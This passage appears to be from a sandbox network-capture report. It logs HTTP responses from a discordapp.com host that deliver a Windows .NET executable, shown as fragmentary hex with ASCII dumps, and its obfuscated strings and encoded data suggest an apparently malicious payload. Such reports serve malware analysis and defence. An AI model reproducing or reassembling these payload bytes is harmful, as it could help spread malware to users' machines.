ABPtcPoiAF9iyGRhzbWhDGA4S4DxkeMA5BT4td0yc4uWqAdaQyK7pMPo-On5NsfPK7R9bQGEweAFy9HQaA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=M0ulsihW9j6MNtds77J5Y4OoRj4g5rrWaS0XEX0VVNo-1700298180-0-AZCnjbbhluY3PvhGLGLCgu+yy34GZwEUdHV+dxIL9/1lt9iwnnTz8mA07U+xXTRBfhw+KckCJWriq6WsaTAzNEI=; path=/; expires=Sat, 18-Nov-23 09:33:00 GMT; domain=.discordapp.com; HttpOnly; Secure
2023-11-18 09:03:00 UTC	10515	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 35 25 32 46 78 74 63 6d 36 7a 39 48 66 5a 69 25 32 42 76 6b 73 66 42 73 43 56 6f 31 36 4b 66 6a 6a 4c 5a 4b 68 31 4a 39 61 5a 67 5a 71 71 33 4a 4f 39 71 25 32 46 61 79 35 65 58 31 47 30 79 47 70 42 68 4a 48 45 71 66 65 25 32 42 45 77 4d 49 68 46 49 25 32 46 61 61 6e 4a 74 32 75 69 62 79 58 32 37 5a 5a 6d 58 73 39 37 47 44 35 6a 30 57 6d 42 33 50 75 44 55 47 35 53 76 6a 6c 36 59 73 6c 5a 48 6a 7a 71 54 35 4b 30 64 5a 69 68 4f 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5%2Fxtcm6z9HfZi%2BvksfBsCVo16KfjjLZKh1J9aZgZqq3JO9q%2Fay5eX1G0yGpBhJHEqfe%2BEwMIhFI%2FaanJt2uibyX27ZZmXs97GD5j0WmB3PuDUG5Svjl6YslZHjzqT5K0dZihOg%3D%3D"}],"group":"cf-nel","max_a
2023-11-18 09:03:00 UTC	10515	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e 59 39 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 cf 30 02 00 38 03 00 00 00 00 00 00 c9 50 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY9e"008P `@ @
2023-11-18 09:03:00 UTC	10516	IN	Data Raw: d0 db 06 00 00 00 65 02 74 29 0b 0a 08 11 00 0b 07 00 00 00 d1 15 09 79 a6 b4 b8 a7 a1 b2 a5 09 00 00 00 b3 37 08 4d d8 c1 d2 db c0 d6 c1 da c4 07 00 00 00 e2 9c 5d 3e 8c 8d 8f 87 8e 8b 84 06 00 00 00 70 fe 4d 1f 1e 1f 1d 17 15 02 04 00 00 00 3b 7f ba 58 55 52 5a 58 07 00 00 00 a5 a9 2b 7e c9 c9 e1 c0 cc c7 f6 04 00 00 00 62 36 a1 5f 0c 2b 1a 31 03 00 00 00 28 fd 45 11 1a 4e 7b 05 00 00 00 89 66 e2 66 e2 e1 f1 e7 fa 08 00 00 00 65 f7 c1 3c 57 56 11 17 13 01 08 06 22 00 00 00 18 4e 12 0e 75 7d 6c 6b 61 4b 6a 7d 6c 6d 68 75 77 5b 47 2a 2b 76 71 4f 38 75 77 6a 7e 38 32 38 6c 7b 7d 74 7d 4b 0c 00 00 00 97 35 82 44 e5 f2 e5 e2 e3 f4 f6 f1 e2 f9 f6 da 15 00 00 00 dd 7c 47 38 b3 b2 b4 a9 bc af b2 ad af b2 be fd a9 bb b2 ae b2 af be b4 b0 05 00 00 00 20 91 6d 5f Data Ascii: et)y7M]>pM;XURZX+~b6_+1(EN{ffe<WV"Nu}lkaKj}lmhuw[G*+vqO8uwj~828l{}t}K5D\|G8 m_
2023-11-18 09:03:00 UTC	10518	IN	Data Raw: 3a ff 47 7e 58 5e 56 5f 4c 5f 56 66 5f 5d 5b 48 55 4e 69 1a 56 5b 59 55 76 66 5b 5e 48 5b 4f 7d 0e 00 00 00 2e 8e 3f 7b 01 5d 5a 4b 42 42 4f 59 41 5a 5e 57 5c 6d 01 00 00 00 46 4b 36 24 69 01 00 00 00 32 16 e1 76 6e 08 00 00 00 5d 62 91 75 2e 38 31 34 3b 32 2f 0d 07 00 00 00 4e 86 e0 06 2c 2a 60 7d 37 2b 25 07 00 00 00 0c c7 bd 00 6e 68 22 3f 75 69 67 07 00 00 00 a8 f3 6d 25 ca cc 86 9c d1 cd c3 07 00 00 00 0c cc 98 72 6e 68 22 38 75 69 67 0e 00 00 00 0c e4 3c 46 69 78 65 60 7d 7f 22 7f 69 65 67 63 63 6f 0b 00 00 00 ae 0c 7f 75 dd cb c7 c5 c1 c1 cd f1 d4 c1 c3 12 00 00 00 6c 63 68 7a 09 18 05 00 1d 1f 42 15 1e 03 18 1f 05 04 01 1e 03 0a 0f 00 00 00 ab 22 df 6f d2 d9 c4 df d8 c2 c3 c6 d9 c4 cd f4 d1 c4 c6 19 00 00 00 6e fa c2 33 31 1d 0b 07 05 01 01 2d 41 Data Ascii: :G~X^V_L_Vf_][HUNiV[YUvf[^H[O}.?{]ZKBBOYAZ^W\mFK6$i2vn]bu.814;2/N,*`}7+%nh"?uigm%rnh"8uig<Fixe`}"iegccoulchzB"on31-A
2023-11-18 09:03:00 UTC	10519	IN	Data Raw: 50 5c 5b 5a 5d 56 57 51 58 5b 45 51 59 51 5f 59 50 5a 0b 00 00 00 d7 a0 08 3d a4 a4 b6 87 a5 b2 a4 a0 b8 a5 95 20 00 00 00 de c5 7b 06 b6 bd b8 bf ba ba ba b7 b6 bb b9 b8 b7 b8 bd b1 b2 b1 b0 b7 b6 b0 bb b5 b9 b3 b1 ba ae bb bf b0 04 00 00 00 82 9c 20 52 cb c9 db cf 20 00 00 00 f0 5d 48 48 94 95 94 99 9d 9d 99 93 97 94 98 95 98 80 80 9e 9d 97 9b 9e 9c 93 9b 80 94 9f 97 80 9b 99 9d 92 08 00 00 00 f0 26 02 7d 89 84 99 9b 99 9c 80 a3 20 00 00 00 25 a7 9d 33 47 49 4e 49 44 44 43 4b 44 42 48 49 41 48 4e 48 4f 48 41 49 4a 46 44 55 40 49 46 43 4f 43 4d 4f 09 00 00 00 26 25 86 30 5f 43 6d 48 49 4b 4b 49 65 20 00 00 00 c5 34 8d 5b a1 a0 a1 ab a8 ad a4 a9 a2 a4 af af a3 ae aa ac a8 b5 ab a7 a3 a7 aa a6 b5 af a3 a0 a3 a2 ad a6 0a 00 00 00 61 b6 f2 46 15 0d 14 00 37 Data Ascii: P\[Z]VWQX[EQYQ_YPZ= { R ]HH&} %3GINIDDCKDBHIAHNHOHAIJFDU@IFCOCMO&%0_CmHIKKIe 4[aF7
2023-11-18 09:03:00 UTC	10520	IN	Data Raw: 71 7e 76 70 72 7f 73 7e 6b 7c 77 6b 72 76 71 7a 6b 79 79 77 72 0c 00 00 00 2c a7 9b 77 58 49 40 40 4d 7b 0c 58 5f 59 5e 78 20 00 00 00 6d 68 71 09 0a 08 00 0c 0f 0c 0c 0c 0a 01 0f 1d 06 0e 01 01 02 06 0f 07 00 09 0c 08 03 00 0e 0e 01 03 06 1d 0a 00 00 00 15 ee ba 74 61 70 79 79 74 42 74 61 70 58 20 00 00 00 11 3c 89 5c 76 75 7a 70 76 7b 7a 7c 7f 7a 75 76 7f 61 7b 70 75 70 72 7e 78 77 74 77 72 7e 7e 7a 7f 7a 77 61 0d 00 00 00 81 f3 3c 37 f5 e4 ed ed e0 d6 a1 e0 e5 f3 e0 f4 c6 20 00 00 00 f7 e5 0e 3d 9a 99 9b 92 9c 91 91 91 90 91 96 99 9c 9b 90 95 9d 87 87 93 90 9c 87 91 9d 94 9f 91 9b 90 94 91 06 00 00 00 6f c6 d9 41 1c 1a 0b 00 17 2a 20 00 00 00 0b b8 0f 11 65 64 65 66 65 7b 6f 60 69 60 60 6a 62 63 61 60 6d 66 69 6c 6c 66 66 65 63 6a 65 7b 7b 60 6f 62 0c Data Ascii: q~vprs~k\|wkrvqzkyywr,wXI@@M{X_Y^x mhqtapyytBtapX <\vuzpv{z\|zuva{pupr~xwtwr~~zzwa<7 =oA* edefe{o`i``jbca`mfillffecje{{`ob
2023-11-18 09:03:00 UTC	10522	IN	Data Raw: 99 98 91 95 9b 97 92 90 9e 96 96 98 9f 95 9e 95 94 91 8c 97 9a 90 94 98 93 9f 94 97 17 00 00 00 e7 25 e1 03 95 88 93 86 84 8e 93 89 82 8f 93 92 a6 c7 93 81 88 94 88 95 84 8e aa 20 00 00 00 5c 0e 59 1b 32 31 33 31 2c 3d 3a 36 35 37 2c 30 3a 37 32 33 34 3a 36 2c 38 32 3b 3e 35 2c 3e 32 38 3e 3a 3e 05 00 00 00 87 30 95 7c fe ef f3 f2 c6 20 00 00 00 ec de 65 43 80 8d 8f 9c 89 80 81 86 8b 8e 83 88 80 88 8b 84 89 83 89 8a 8d 8f 81 88 82 86 8e 88 8a 8a 86 8b 0a 00 00 00 06 05 77 1e 63 6a 6f 64 69 4b 26 69 73 42 20 00 00 00 f8 87 a4 54 92 97 90 95 9f 9f 9a 88 9b 91 95 95 88 9d 9c 95 9f 9a 9c 9e 9d 91 99 93 94 92 9b 91 94 9c 91 9d 08 00 00 00 c9 9c fe 5b a1 bd bc 88 e9 99 9d 86 20 00 00 00 74 15 8e 43 1c 17 18 1b 1e 11 1e 10 1a 18 17 1b 1d 04 19 1b 18 13 13 16 15 Data Ascii: % \Y2131,=:657,0:7234:6,82;>5,>28>:>0\| eCwcjodiK&isB T[ tC
2023-11-18 09:03:00 UTC	10523	IN	Data Raw: 69 3a 32 6f 26 69 32 3e 6f 21 69 32 28 7c 7d 7b 66 73 71 7d 7e 32 7f 7b 66 71 7b 44 18 3b 6f 20 69 32 28 42 5b 48 3a 32 6f 23 69 32 28 61 61 77 60 76 76 73 32 42 5b 18 6f 61 61 28 7f 7f 28 5a 5a 32 6b 6b 6b 6b 3d 5f 5f 3d 76 76 28 22 69 32 28 77 7f 7b 66 32 7a 71 7c 67 73 7e 32 76 7e 7b 67 50 18 18 6e 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 6e 18 6e 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 32 66 7d 70 77 7c 73 7b 7c 75 73 52 32 28 7f 73 60 75 77 7e 77 46 32 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 6e 18 6e 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 32 60 77 7e 73 77 66 41 32 77 7c 73 7b 7c 75 53 32 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f Data Ascii: i:2o&i2>o!i2(\|}{fsq}~2{fq{D;o i2(B[H:2o#i2(aaw`vvs2B[oaa((ZZ2kkkk=__=vv("i2(w{f2zq\|gs~2v~{gPn????????????????????????????????????????????????????nn??????????????2f}pw\|s{\|usR2(s`uw~wF2???????????????nn?????????????????2`w~swfA2w\|s{\|uS2??????????
2023-11-18 09:03:00 UTC	10524	IN	Data Raw: 00 27 61 34 20 42 4a 46 69 07 00 00 00 2c 3e 1e 26 42 5b 43 42 47 42 79 07 00 00 00 c9 1b a1 53 a7 be a6 a7 a2 a7 9c 22 00 00 00 58 c9 ee 31 35 3d 2c 2b 21 0b 2a 3d 2c 2d 28 35 37 1b 07 6a 6b 36 31 0f 78 15 17 0a 1e 78 72 78 0c 1b 1d 14 1d 0b 13 00 00 00 92 7d 40 25 eb e0 fd ff f7 df fe f3 f1 fb e1 eb fa c2 fe f3 e6 fd c6 01 00 00 00 32 91 4c 6a 02 0f 00 00 00 26 93 57 52 54 49 55 55 43 45 49 54 76 79 14 15 48 4f 71 0b 00 00 00 5e a0 57 06 3a 17 2c 31 2d 2d 3b 3d 31 2c 0e 0f 00 00 00 78 c7 1b 08 1d 0e 11 0a 3c 13 0b 11 3c 27 4a 4b 16 11 2f 0c 00 00 00 7b 11 b6 38 09 1e 19 16 0e 35 17 1a 12 09 1e 28 0e 00 00 00 3c 4f 29 09 1c 71 73 6e 7a 1c 16 1c 68 7f 79 70 79 6f 02 00 00 00 5c bf 7e 19 6e 04 07 00 00 00 f9 ac df 5d 97 8e 96 97 92 97 ac 0a 00 00 00 ce 13 Data Ascii: 'a4 BJFi,>&B[CBGByS"X15=,+!*=,-(57jk61xxrx}@%2Lj&WRTIUUCEITvyHOq^W:,1--;=1,x<<'JK/{85(<O)qsnzhypyo\~n]
2023-11-18 09:03:00 UTC	10526	IN	Data Raw: 29 28 3a 22 21 21 2c 6d 39 22 23 6d 3e 24 6d 2a 23 24 39 24 3f 1a 02 00 00 00 75 65 60 24 44 03 0a 00 00 00 07 1a 9b 71 6b 6b 63 29 73 77 7e 75 64 65 0d 00 00 00 ae 28 3d 28 da de d7 dc cd cb ea da de d7 dc ed ec 0a 00 00 00 87 42 96 70 eb eb e3 a9 f3 f7 fe f5 e4 e5 10 00 00 00 af 0f c4 0d d6 ca e4 d6 c0 dd db dc ca eb db df d6 dd ec ed 0a 00 00 00 f3 13 7f 3f 9f 9f 97 dd 87 83 8a 81 90 91 1c 00 00 00 4a e9 dd 55 38 2f 2e 23 3c 25 38 1a 27 22 3e 23 38 25 2d 26 0b 2f 39 25 26 09 3e 3a 33 38 09 08 03 00 00 00 1e 82 5a 5f 4d 5b 5f 1c 00 00 00 22 ff 81 06 50 47 46 4b 54 4d 50 72 02 47 54 4b 56 4b 4f 4b 50 72 02 56 44 4d 51 4d 50 41 4b 6f 0f 00 00 00 2c 8d 5c 0a 61 6f 6b 49 48 43 61 4b 42 45 42 45 4d 44 6f 0a 00 00 00 cb 1e c0 79 a7 a7 af e5 bf bb b2 b9 a8 a9 Data Ascii: )(:"!!,m9"#m>$m*#$9$?ue`$Dqkkc)sw~ude(=(Bp?JU8/.#<%8'">#8%-&/9%&>:38Z_M[_"PGFKTMPrGTKVKOKPrVDMQMPAKo,\aokIHCaKBEBEMDoy
2023-11-18 09:03:00 UTC	10527	IN	Data Raw: 31 d3 a4 db a7 a2 c3 a8 9a a1 9e ae c0 8e cd 8e a8 9d 0c 00 00 00 4c 58 29 0e 76 1d 2f 14 2b 1b 75 3b 78 3b 1d 28 06 2a 1e 02 7b 0d 00 00 0a 2a 1e 02 7b 0e 00 00 0a 2a 56 02 28 0f 00 00 0a 02 03 7d 0d 00 00 0a 02 04 7d 0e 00 00 0a 2a d2 20 36 13 6a f8 20 29 55 55 a5 5a 28 11 00 00 0a 02 7b 0d 00 00 0a 6f 15 00 00 0a 58 20 29 55 55 a5 5a 28 13 00 00 0a 02 7b 0e 00 00 0a 6f 16 00 00 0a 58 2a 1e 02 7b 18 00 00 0a 2a 1e 02 7b 19 00 00 0a 2a 56 02 28 0f 00 00 0a 02 03 7d 18 00 00 0a 02 04 7d 19 00 00 0a 2a d2 20 8c 56 30 3b 20 29 55 55 a5 5a 28 11 00 00 0a 02 7b 18 00 00 0a 6f 15 00 00 0a 58 20 29 55 55 a5 5a 28 13 00 00 0a 02 7b 19 00 00 0a 6f 16 00 00 0a 58 2a 1e 02 7b 1a 00 00 0a 2a 1e 02 7b 1b 00 00 0a 2a 56 02 28 0f 00 00 0a 02 03 7d 1a 00 00 0a 02 04 7d Data Ascii: 1LX)v/+u;x;({{V(}} 6j )UUZ({oX )UUZ({oX{{V(}} V0; )UUZ({oX )UUZ({oX{{*V(}}
2023-11-18 09:03:00 UTC	10528	IN	Data Raw: 03 7d 56 00 00 04 2a 1e 02 7b 57 00 00 04 2a 22 02 03 7d 57 00 00 04 2a 1e 02 7b 58 00 00 04 2a 1e 02 7b 59 00 00 04 2a 22 02 03 7d 59 00 00 04 2a 4a 02 28 0f 00 00 0a 02 73 43 01 00 0a 7d 58 00 00 04 2a 1e 02 7b 5a 00 00 04 2a 1e 02 28 5a 01 00 0a 2a 2e 73 e1 00 00 06 80 63 00 00 04 2a 1e 02 28 0f 00 00 0a 2a 1e 02 28 0f 00 00 0a 2a 4a 03 02 7b 65 00 00 04 6f 61 01 00 0a 6f 03 00 00 0a 2a 1e 02 28 0f 00 00 0a 2a 5e 02 7b 66 00 00 04 03 6f 62 01 00 0a 6f 35 00 00 0a 28 34 00 00 2b 2a 2e 73 e8 00 00 06 80 67 00 00 04 2a 1e 02 28 0f 00 00 0a 2a 1e 03 6f 2e 00 00 06 2a 1e 03 28 35 00 00 2b 2a 4a 03 fe 06 30 00 00 06 73 64 01 00 0a 73 65 01 00 0a 2a 1e 03 6f 66 01 00 0a 2a 1e 03 6f 67 01 00 0a 2a 5e 03 7e 18 00 00 04 03 6f 79 00 00 0a 6f 68 01 00 0a 6f d8 00 Data Ascii: }V{W"}W{X{Y"}YJ(sC}X{Z(Z.sc((J{eoao(^{fobo5(4+.sg(o.(5+J0sdseofog^~oyoho
2023-11-18 09:03:00 UTC	10530	IN	Data Raw: 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 05 00 00 0a a2 25 17 02 7b 0e 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 05 00 00 0a a2 28 17 00 00 0a 2a 00 13 30 03 00 41 00 00 00 03 00 00 11 03 75 08 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 11 00 00 0a 02 7b 18 00 00 0a 06 7b 18 00 00 0a 6f 12 00 00 0a 2c 17 28 13 00 00 0a 02 7b 19 00 00 0a 06 7b 19 00 00 0a 6f 14 00 00 0a 2a 16 2a 17 2a 00 00 00 13 30 07 00 67 00 00 00 02 00 00 11 14 20 2f 97 69 29 28 df 00 00 06 18 8d 1c 00 00 01 25 16 02 7b 18 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 05 00 00 0a a2 25 17 02 7b 19 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 Data Ascii: q-&+o%{%q-&+o(0Au.4,/({{o,({{o**0g /i)(%{%q-&+o%{%q-&+
2023-11-18 09:03:00 UTC	10531	IN	Data Raw: 28 03 00 00 2b 2a 1b 30 02 00 a5 01 00 00 0a 00 00 11 20 1c 95 69 29 28 df 00 00 06 73 30 00 00 0a 0a 06 6f 31 00 00 0a 0b 07 6f 32 00 00 0a 0c 38 b6 00 00 00 08 6f 33 00 00 0a 0d 09 20 42 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 6f 35 00 00 0a 20 5e 95 69 29 28 df 00 00 06 28 36 00 00 0a 2c 2b 09 20 71 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 6f 37 00 00 0a 20 84 95 69 29 28 df 00 00 06 6f 28 00 00 0a 2d 51 09 20 95 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 6f 35 00 00 0a 20 a1 95 69 29 28 df 00 00 06 6f 28 00 00 0a 2d 26 09 20 b3 95 69 29 28 df 00 00 06 6f 34 00 00 0a 6f 05 00 00 0a 20 c6 95 69 29 28 df 00 00 06 28 36 00 00 0a 2c 08 17 13 04 dd c9 00 00 00 08 6f 38 00 00 0a 3a 3f ff ff ff de 0a 08 2c 06 08 6f 06 00 Data Ascii: (+*0 i)(s0o1o28o3 Bi)(o4oo5 ^i)((6,+ qi)(o4oo7 i)(o(-Q i)(o4oo5 i)(o(-& i)(o4o i)((6,o8:?,o
2023-11-18 09:03:00 UTC	10533	IN	Data Raw: 04 20 e7 93 69 29 28 df 00 00 06 7e 08 00 00 04 28 3b 00 00 0a 28 20 00 00 06 28 68 00 00 06 7e 0f 00 00 04 20 f4 93 69 29 28 df 00 00 06 28 36 00 00 0a 2c 1a 28 18 00 00 06 2c 06 16 28 1c 00 00 0a 28 1b 00 00 06 2c 06 16 28 1c 00 00 0a 7e 10 00 00 04 20 fb 93 69 29 28 df 00 00 06 28 36 00 00 0a 2c 0d 28 1a 00 00 06 2c 06 16 28 1c 00 00 0a 7e 11 00 00 04 20 02 92 69 29 28 df 00 00 06 28 36 00 00 0a 2c 0d 28 1d 00 00 06 2c 06 16 28 1c 00 00 0a 7e 12 00 00 04 20 09 92 69 29 28 df 00 00 06 28 36 00 00 0a 2c 0d 28 19 00 00 06 2c 06 16 28 1c 00 00 0a 7e 08 00 00 04 20 10 92 69 29 28 df 00 00 06 28 3c 00 00 0a 2c 0d 28 17 00 00 06 2c 06 16 28 1c 00 00 0a de 03 26 de 00 73 48 00 00 0a 0a 73 ef 00 00 06 0b 07 06 14 16 28 92 00 00 06 7d 6e 00 00 04 28 04 00 00 2b Data Ascii: i)(~(;( (h~ i)((6,(,((,(~ i)((6,(,(~ i)((6,(,(~ i)((6,(,(~ i)((<,(,(&sHs(}n(+
2023-11-18 09:03:00 UTC	10534	IN	Data Raw: 11 04 11 05 9a 7d 74 00 00 04 11 06 fe 06 fd 00 00 06 73 62 00 00 0a 28 0d 00 00 2b 13 07 11 07 2c 56 06 73 d1 00 00 06 25 20 ff 91 69 29 28 df 00 00 06 12 02 28 6c 00 00 0a 20 09 90 69 29 28 df 00 00 06 11 06 7b 74 00 00 04 09 20 10 90 69 29 28 df 00 00 06 28 47 00 00 0a 14 6f 3f 00 00 0a 28 6d 00 00 0a 6f ce 00 00 06 25 11 07 6f d0 00 00 06 6f 63 00 00 0a 11 05 17 58 13 05 11 05 11 04 8e 69 3f 6e ff ff ff 12 01 28 6e 00 00 0a 3a 25 ff ff ff de 0e 12 01 fe 16 17 00 00 1b 6f 06 00 00 0a dc 06 2a 00 01 0c 00 00 02 00 e1 00 e2 c3 01 0e 00 00 00 00 1b 30 06 00 18 03 00 00 16 00 00 11 73 5f 00 00 0a 0a 73 46 00 00 0a 25 1f 1a 28 50 00 00 0a 6f 3e 00 00 0a 6f 60 00 00 0a 0b 38 d2 02 00 00 12 01 28 61 00 00 0a 7e 76 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 00 Data Ascii: }tsb(+,Vs% i)((l i)({t i)((Go?(mo%oocXi?n(n:%o*0s_sF%(Po>o`8(a~v%-&~u
2023-11-18 09:03:00 UTC	10535	IN	Data Raw: 06 11 0e 6f d6 00 00 06 16 6f 7a 00 00 0a 6f d6 00 00 06 18 6f 7a 00 00 0a 6f d7 00 00 06 28 bc 00 00 06 13 0f 11 08 11 0f 2d 07 7e 44 00 00 0a 2b 1b 11 0f 20 bf 9f 69 29 28 df 00 00 06 20 41 60 96 d6 28 df 00 00 06 28 7b 00 00 0a 6f 3e 00 00 0a 11 0b 17 58 13 0b 11 0b 11 0a 8e 69 3f 45 ff ff ff 11 08 6f 7c 00 00 0a 13 09 11 09 17 9a 6f 79 00 00 0a 16 3e d3 fe ff ff 07 11 07 11 09 16 9a 11 09 17 9a 04 20 c1 9f 69 29 28 df 00 00 06 05 28 6d 00 00 06 6f 3e 00 00 0a 38 ad fe ff ff 07 2a 13 30 05 00 6a 04 00 00 18 00 00 11 73 ad 00 00 06 0a 02 16 28 87 00 00 06 0b 07 2d 02 14 2a 07 20 c8 9f 69 29 28 df 00 00 06 6f 8c 00 00 06 2d 02 14 2a 16 0c 38 2e 04 00 00 28 25 00 00 0a 07 08 16 6f 88 00 00 06 74 1c 00 00 1b 6f 55 00 00 0a 20 d8 9f 69 29 28 df 00 00 06 28 Data Ascii: oozoozo(-~D+ i)( A`(({o>Xi?Eo\|oy> i)((mo>80js(- i)(o-*8.(%otoU i)((
2023-11-18 09:03:00 UTC	10537	IN	Data Raw: 00 00 06 7e 79 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 03 01 00 06 73 80 00 00 0a 25 80 79 00 00 04 28 11 00 00 2b 7e 7a 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 04 01 00 06 73 82 00 00 0a 25 80 7a 00 00 04 28 12 00 00 2b 28 13 00 00 2b 0d 09 2d 02 14 2a 09 20 8e 9e 69 29 28 df 00 00 06 14 6f 3f 00 00 0a 0d 09 18 18 6f 84 00 00 0a 20 03 02 00 00 28 85 00 00 0a 18 5a 13 04 09 1c 11 04 6f 84 00 00 0a 13 05 09 6f 79 00 00 0a 1c 11 04 58 1f 24 58 59 13 06 09 1c 11 04 58 1a 58 11 06 58 6f 86 00 00 0a 13 07 08 6f db 00 00 06 7e 7b 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 05 01 00 06 73 80 00 00 0a 25 80 7b 00 00 04 28 11 00 00 2b 7e 7c 00 00 04 25 2d 17 26 7e 75 00 00 04 fe 06 06 01 00 06 73 82 00 00 0a 25 80 7c 00 00 04 28 12 00 00 2b 28 13 00 00 2b 13 08 Data Ascii: ~y%-&~us%y(+~z%-&~us%z(+(+-* i)(o?o (ZooyX$XYXXXoo~{%-&~us%{(+~\|%-&~us%\|(+(+
2023-11-18 09:03:00 UTC	10538	IN	Data Raw: 11 09 20 4c 9d 69 29 28 df 00 00 06 28 69 00 00 0a 20 5a 9d 69 29 28 df 00 00 06 11 0a fe 06 15 01 00 06 73 72 00 00 0a 28 71 00 00 06 6f 71 00 00 0a 06 11 09 11 0a 7b 8a 00 00 04 7b 86 00 00 04 11 0a 7b 89 00 00 04 28 46 00 00 06 6f 8b 00 00 0a 09 11 09 20 6c 9d 69 29 28 df 00 00 06 28 69 00 00 0a 20 7c 9d 69 29 28 df 00 00 06 11 0a fe 06 16 01 00 06 73 72 00 00 0a 28 71 00 00 06 6f 71 00 00 0a 11 0b 6f 73 00 00 0a 16 3e 83 00 00 00 06 73 d1 00 00 06 13 0f 11 0f 1b 8d 29 00 00 01 25 16 20 88 9d 69 29 28 df 00 00 06 a2 25 17 11 0a 7b 8a 00 00 04 7b 86 00 00 04 a2 25 18 20 b7 9d 69 29 28 df 00 00 06 a2 25 19 11 0a 7b 89 00 00 04 a2 25 1a 20 bd 9d 69 29 28 df 00 00 06 a2 28 74 00 00 0a 6f ce 00 00 06 11 0f 28 25 00 00 0a 20 c0 9d 69 29 28 df 00 00 06 11 0b Data Ascii: Li)((i Zi)(sr(qoq{{{(Fo li)((i \|i)(sr(qoqos>s)% i)(%{{% i)(%{% i)((to(% i)(
2023-11-18 09:03:00 UTC	10539	IN	Data Raw: df 00 00 06 20 25 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 4d 98 69 29 28 df 00 00 06 20 5f 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 87 98 69 29 28 df 00 00 06 20 89 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 b1 98 69 29 28 df 00 00 06 20 c2 98 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 ea 98 69 29 28 df 00 00 06 20 05 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 2d 87 69 29 28 df 00 00 06 20 30 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 58 87 69 29 28 df 00 00 06 20 6a 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 92 87 69 29 28 df 00 00 06 20 a4 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 cc 87 69 29 28 df 00 00 06 20 d1 87 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 f9 87 69 29 28 df 00 00 06 20 0b 86 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 Data Ascii: %i)(oe% Mi)( _i)(oe% i)( i)(oe% i)( i)(oe% i)( i)(oe% -i)( 0i)(oe% Xi)( ji)(oe% i)( i)(oe% i)( i)(oe% i)( i)(oe%
